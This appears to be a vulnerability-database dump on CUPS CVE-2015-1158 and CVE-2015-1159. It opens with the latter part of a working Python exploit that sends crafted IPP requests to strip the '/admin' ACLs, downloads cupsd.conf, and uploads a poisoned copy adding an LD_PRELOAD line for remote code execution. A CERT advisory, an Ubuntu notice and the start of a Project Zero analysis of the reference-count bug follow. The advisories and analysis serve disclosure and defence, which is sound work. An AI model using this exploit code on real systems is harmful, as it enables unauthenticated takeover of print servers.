\"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n sendJobRequest = http_header2 + send_document_packet\n blah2 = txrx(rhost,int(rport),\"tcp\",sendJobRequest)\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\n pretty(\"*\",\"job id: \" + jobid)\n return jobid\n\ndef stompACL(rhost, rport, printer):\n i = random.randint(1,1024)\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\n\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\n str(pack(\">i\",(i+1)))+\n \"\\x01\" # op attributes marker\n \"\\x47\" # charset\n \"\\x00\\x12\" # name len: 18\n \"attributes-charset\"\n \"\\x00\\x08\" # val len: 8\n \"us-ascii\"\n \"\\x48\" # natural language\n \"\\x00\\x1b\" # name len: 27\n \"attributes-natural-language\"\n \"\\x00\\x06\" # val len: 6\n \"/admin\"\n \"\\x45\" # printer-uri\n \"\\x00\\x0b\" # name len 11\n \"printer-uri\" +\n str(pack(\">h\", len(printer_url))) + printer_url +\n \"\\x42\" # name without lang\n \"\\x00\\x14\" # name len: 20\n \"requesting-user-name\"\n \"\\x00\\x06\" # val len: 6\n \"/admin\"\n \"\\x02\" # job attrs marker\n \"\\x21\" # integer\n \"\\x00\\x06\" # name len: 6\n \"copies\"\n \"\\x00\\x04\" # val len: 4\n \"\\x00\\x00\\x00\\x01\" # 1\n \"\\x42\" # name w/o lang\n \"\\x00\\x19\" # name len: 25\n \"job-originating-host-name\"\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val 
len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x36\" # nwl\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x16\" # val len: 22\n \"\\x00\\x06\" # length\n \"/admin\"\n \"\\x00\\x0c\"\n \"BBBBBBBBBBBB\"\n \"\\x03\") # end of attributes\n\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\n str(pack(\">i\",(i+2)))+\n \"\\x01\" # op attributes marker\n \"\\x47\" # charset\n \"\\x00\\x12\" # name len: 18\n \"attributes-charset\"\n \"\\x00\\x08\" # val len: 8\n \"us-ascii\"\n \"\\x48\" # natural language\n \"\\x00\\x1b\" # name len: 27\n \"attributes-natural-language\"\n \"\\x00\\x0b\" # val len: 11\n \"/admin/conf\"\n \"\\x45\" # printer-uri\n \"\\x00\\x0b\" # name len 11\n \"printer-uri\" +\n str(pack(\">h\", len(printer_url))) + printer_url +\n \"\\x42\" # name without lang\n \"\\x00\\x14\" # name len: 20\n \"requesting-user-name\"\n \"\\x00\\x0b\" # val len: 11\n \"/admin/conf\"\n \"\\x02\" # job attrs marker\n \"\\x21\" # integer\n \"\\x00\\x06\" # name len: 6\n \"copies\"\n \"\\x00\\x04\" # val len: 4\n \"\\x00\\x00\\x00\\x01\" # 1\n \"\\x42\" # name w/o lang\n \"\\x00\\x19\" # name len: 25\n \"job-originating-host-name\"\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n 
\"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x42\" # nwol\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x0c\" # val len: 12\n \"AAAAAAAAAAAA\"\n \"\\x36\" # nwl\n \"\\x00\\x00\" # name len: 0\n \"\\x00\\x1b\" # val len: 27\n \"\\x00\\x0b\" # length\n \"/admin/conf\"\n \"\\x00\\x0c\"\n \"BBBBBBBBBBBB\"\n \"\\x03\") # end of attributes\n\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n pretty(\"*\",\"stomping ACL\")\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\n time.sleep(1)\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\n pretty(\"*\",\"<:\\n\" + 
createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\n\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n pretty(\"*\",\"checking /admin\")\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\n res = txrx(rhost,rport,\"tcp\",http_header_check)\n pretty(\"*\",\"<:\\n\" + createDump(res))\n m = re.search('200 OK', res)\n if m is not None:\n pretty(\"+\",\"ACL stomp successful\")\n else:\n pretty(\"-\",\"exploit failed\")\n exit(1)\n\n\ndef getConfig(rhost, rport):\n i = random.randint(1,1024)\n original_config = \"\"\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Close\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n\n pretty(\"*\",\"grabbing configuration file....\")\n res = txrx(rhost,rport,\"tcp\",http_request)\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\n original_config = res_array[1]\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\n return original_config\n\ndef putConfig(rhost, rport, config):\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\n \"Content-Type: application/ipp\\x0d\\x0a\"\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\n \"Connection: Keep-Alive\\x0d\\x0a\"\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\n \"\\x0d\\x0a\")\n pretty(\"*\",\"overwriting config...\")\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\n\ndef poisonConfig(config, name):\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d000\" + name + \"-001\\x0a\"\n return config\n\ndef main():\n rhost = None;\n rport = None;\n noshell = None;\n options, remainder = getopt.getopt(sys.argv[1:], 
'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])\n for opt, arg in options:\n if opt in ('-h', '--help'):\n usage()\n elif opt in ('-a','--rhost'):\n rhost = arg;\n elif opt in ('-b','--rport'):\n rport = arg;\n elif opt in ('-c','--lib'):\n libpath = arg;\n elif opt in ('-f','--stomp-only'):\n noshell = 1;\n banner()\n if rhost is None or rport is None:\n usage()\n pretty(\"*\",\"locate available printer\")\n printer = locatePrinters(rhost, rport)\n pretty(\"*\",\"stomp ACL\")\n stompACL(rhost, rport, printer)\n if (noshell is not None):\n pretty(\"*\",\"fin\")\n exit(0)\n pretty(\"*\",\"prepare payload\")\n payload = preparePayload(libpath)\n pretty(\"*\",\"spray payload\")\n jobid = seedTarget(rhost, rport, printer, payload)\n pretty(\"*\",\"grab original config\")\n OG_config = getConfig(rhost, rport)\n pretty(\"*\",\"generate poison config\")\n evil_config = poisonConfig(OG_config, jobid)\n pretty(\"*\",\"upload poison config\")\n putConfig(rhost, rport, evil_config)\n pretty(\"*\",\"fin\")\n exit(0);\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "### Overview \n\nCUPS implements the Internet Printing Protocol (IPP) for UNIX-derived operating systems. Various versions of CUPS are vulnerable to a privilege escalation due to a memory management error.\n\n### Description \n\n[**CWE-911**](<http://cwe.mitre.org/data/definitions/911.html>)**: Improper Update of Reference Count - **CVE-2015-1158\n\nAn issue with how localized strings are handled in `cupsd` allows a reference counter to over-decrement when handling certain print job request errors. As a result, an attacker can prematurely free an arbitrary string of global scope, creating a dangling pointer to a repurposed block of memory on the heap. 
The dangling pointer causes ACL verification to fail when parsing `'admin/conf'` and `'admin'` ACLs. The ACL handling failure results in unrestricted access to privileged operations, allowing an unauthenticated remote user to upload a replacement CUPS configuration file and mount further attacks. \n \nThis vulnerability was introduced in CUPS 1.2.0, released in 2006. All major versions of CUPS from 1.2 to 2.0 are vulnerable. This vulnerability is exploitable by default and without any special permissions other than the ability to send a print job request. \n \n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVE-2015-1159 \n \nA cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. In certain cases, the CGI template can echo user input to file rather than escaping the text first. This may be used to set up a reflected XSS attack in the QUERY parameter of the web interface help page. By default, many Linux distributions run with the web interface activated; OS X has the web interface deactivated by default. \n \nThe CVSS score below is based on CVE-2015-1158. \n \n--- \n \n### Impact \n\nCVE-2015-1158 may allow a remote unauthenticated attacker access to privileged operations on the CUPS server. CVE-2015-1159 may allow an attacker to execute arbitrary JavaScript in a user's browser. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nA [patch](<http://www.cups.org/blog.php?L1082+I0+Q>) addressing these issues has been released for all supported versions of CUPS. For the version 2.0 branch (the latest release), 2.0.3 contains the patch. Affected users are encouraged to update as soon as possible. 
\n \n--- \n \n### Vendor Information\n\n### Apple Affected\n\nNotified: May 06, 2015 Updated: May 08, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project Affected\n\nNotified: May 08, 2015 Updated: June 10, 2015 \n\n**Statement Date: June 10, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nFreeBSD ships with CUPS in ports tree and was therefore affected.\n\nAn update was done on Jun 9 22:15:48 2015 UTC (r389006).\n\n### SUSE Linux Affected\n\nNotified: May 08, 2015 Updated: June 10, 2015 \n\n**Statement Date: June 10, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSLE 12 is affected and will receive an update soon. 
\nSLE 11 is affected and will receive an update soon.\n\n### Vendor References\n\n * <https://bugzilla.suse.com/show_bug.cgi?id=924208>\n\n### openSUSE project __ Affected\n\nNotified: May 08, 2015 Updated: June 10, 2015 \n\n**Statement Date: June 10, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nopenSUSE 13.1 and 13.2 are affected and will receive updates soon.\n\n### Vendor References\n\n * <https://bugzilla.opensuse.org/show_bug.cgi?id=924208>\n\n### CentOS Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Debian GNU/Linux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DesktopBSD Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. 
Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Mandriva S. A. 
Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OmniTI Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oracle Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Red Hat, Inc. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. 
Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ubuntu Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n\n### References \n\n * <http://www.cups.org/blog.php?L1082+I0+Q>\n * <https://www.cups.org/str.php?L4609>\n\n### Acknowledgements\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-1158](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-1158>), [CVE-2015-1159](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-1159>) \n---|--- \n**Date Public:** | 2015-06-08 \n**Date First Published:** | 2015-06-09 \n**Date Last Updated:** | 2015-06-10 18:34 UTC \n**Document Revision:** | 43 \n", "modified": 
"2015-06-10T18:34:00", "published": "2015-06-09T00:00:00", "id": "VU:810572", "href": "https://www.kb.cert.org/vuls/id/810572", "type": "cert", "title": "CUPS print service is vulnerable to privilege escalation and cross-site scripting", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "It was discovered that CUPS incorrectly handled reference counting when \nhandling localized strings. A remote attacker could use this issue to \nescalate permissions, upload a replacement CUPS configuration file, and \nexecute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a cross-site \nscripting issue. A remote attacker could use this issue to bypass default \nconfiguration settings. (CVE-2015-1159)", "edition": 5, "modified": "2015-06-10T00:00:00", "published": "2015-06-10T00:00:00", "id": "USN-2629-1", "href": "https://ubuntu.com/security/notices/USN-2629-1", "title": "CUPS vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:56", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "description": "Peter De Wachter discovered that CUPS incorrectly handled certain malformed \ncompressed raster files. 
A remote attacker could use this issue to cause \nCUPS to crash, resulting in a denial of service, or possibly execute \narbitrary code.", "edition": 5, "modified": "2015-02-26T00:00:00", "published": "2015-02-26T00:00:00", "id": "USN-2520-1", "href": "https://ubuntu.com/security/notices/USN-2520-1", "title": "CUPS vulnerability", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Guest posted by Neel Mehta (nmehta@google.com) - June 19th, 2015\n\n# Abstract\n\n \n\n\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\n\n \n\n\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\n\n \n\n\nIn this blog post, I describe an exploit chain for several bugs I discovered in [CUPS](<https://www.cups.org/>), an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. 
Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\n\n \n\n\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\n\n# Summary\n\n \n\n\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\n\n \n\n\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\n\n \n\n\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\n\n# Background\n\n \n\n\n## What is CUPS?\n\n \n\n\n[CUPS](<http://www.cups.org/>) is a modular, feature-rich open-source printing system for Unix-based OS's. It abstracts the internals of printing a multitude of file formats on a multitude of printer hardware, reducing the need for printer-specific drivers.\n\n \n\n\nCUPS is maintained by Apple, and runs on Linux, BSD, and variant OS's like Mac OS X. 
It is widely-deployed on desktops, laptops, network print servers, and even some embedded systems. CUPS is the reference implementation for [IPP/2.0 and IPP/2.1](<http://en.wikipedia.org/wiki/Internet_Printing_Protocol>), the latest replacement for LPD / LPR printing. The source tree for CUPS is large and complex, but not uniquely so, at more than 100,000 lines of ANSI C.\n\n## CUPS String Allocation Internals\n\n \n\n\nCUPS makes widespread use of strings with managed-code-like properties. These strings are allocated by '_cupsStrAlloc()' (see cups/string.c:50), which is used like 'strdup(3)', with one fundamental difference: strings are de-duplicated by content and reference counted.\n\n \n\n\nStrings are owned by a global hash table (a 'cups_array_t' / '_cups_array_s' structure, defined in cups/array.c:39). '_cupsStrAlloc()' first checks the hash table for its input string (by content). If the string is in the hash table, it has been previously allocated, and its reference count is incremented. The existing string pointer (from the global array) is returned. If not found in the global hash table, a new heap block is allocated and populated, then inserted with a single reference.\n\n \n\n\nTo be clear, if two disparate functions call '_cupsStrAlloc()' for the same string content, they each get and share the same pointer to a single heap block.\n\n \n\n\nWhen a string is allocated by '_cupsStrAlloc()', it must be released by a call to '_cupsStrFree()' (see cups/string.c:289). This function decrements the reference count, and if none remain it removes the string from the global hash table and frees the block, releasing it back to the allocator. '_cupsStrFree()' ignores pointers that aren't in the global hash table. 
This is fortuitous for exploitation, turning a historical vanilla double-free into a fault-resistant exploit primitive with global, content-targeted scope.\n\n \n\n\n# Reference Count Over-Decrement Issue\n\n \n\n\n## Proper IPP Attribute Teardown\n\n \n\n\nIPP attributes are name-value pairs. They are typed (bool, integer, date, string, etc...), and can be organized in groups. Attributes can have multiple values (one name, associated with multiple values). Attribute types 'IPP_TAG_TEXTLANG' and 'IPP_TAG_NAMELANG' are localized. The character set for these attributes is specified once in the wire protocol, even when the attribute has multiple values (ie all values in the group use the charset).\n\n \n\n\nCups saves attributes in an 'ipp_attribute_t' / '_ipp_attribute_s' structure:\n\n \n\n\ncups/ipp.h:674:\n\ntypedef struct _ipp_attribute_s ipp_attribute_t;\n\n \n\n\ncups/ipp.h:789:\n\nstruct _ipp_attribute_s /**** Attribute ****/\n\n{\n\nipp_attribute_t *next; /* Next attribute in list */\n\nipp_tag_t group_tag, /* Job/Printer/Operation group tag */\n\nvalue_tag; /* What type of value is it? */\n\nchar *name; /* Name of attribute */\n\nint num_values; /* Number of values */\n\n_ipp_value_t values[1]; /* Values */\n\n};\n\n \n\n\nThe 'values' structure member holds a minimum of a single value. For multiple attributes, 'next' points to another attribute structure, containing the next value.\n\n \n\n\n'_ipp_value_t' is defined as:\n\n \n\n\ncups/ipp.h:751:\n\n \n\n\ntypedef union _ipp_value_u /**** Attribute Value ****/\n\n{\n\n<portions omitted>\n\n \n\n\nstruct\n\n{\n\nchar *language; /* Language code */\n\nchar *text; /* String */\n\n} string; /* String with language value */\n\n \n\n\n<portions omitted>\n\n \n\n\n} _ipp_value_t;\n\ntypedef _ipp_value_t ipp_value_t; /**** Convenience typedef that will be removed @private@ ****/\n\n \n\n\nIPP requests are made up of groups of attributes, sent in an HTTP request body. 
When cupsd receives a request, it parses all attribute groups in the request immediately, storing them all in an 'ipp_t' structure (defined in cups/ipp.h:799). String attributes are added to this structure by\n\n'ippAddStrings()'. For multi-value localized string attributes, the first value's '_ipp_value_t.string.language' field is populated by '_cupsStrAlloc()' (which ups the refcount once).\n\n \n\n\nIn a quirky but sweet \"academic\" implementation choice, subsequent values have their '_ipp_value_t.string.language' field shallow-copied from the first value (the refcount is not increased). This mirrors a design choice in the wire protocol, whereby IPP saves bytes on the wire by including the charset only once for a group of values.\n\n \n\n\ncups/ipp.c:1316:\n\n \n\n\n/*\n\n* Initialize the attribute data...\n\n*/\n\n \n\n\nfor (i = num_values, value = attr->values;\n\ni > 0;\n\ni --, value ++)\n\n{\n\nif (language)\n\n{\n\nif (value == attr->values)\n\n{\n\nif ((int)value_tag & IPP_TAG_CUPS_CONST)\n\nvalue->string.language = (char *)language;\n\nelse\n\nvalue->string.language = _cupsStrAlloc(ipp_lang_code(language, code, \u2190 increases refcount\n\nsizeof(code)));\n\n}\n\nelse\n\nvalue->string.language = attr->values[0].string.language; \u2190 shallow copy\n\n}\n\n \n\n\nTo free this type of attribute correctly, '_cupsStrFree()' should be called once, on the first value's 'string.language' pointer.. 
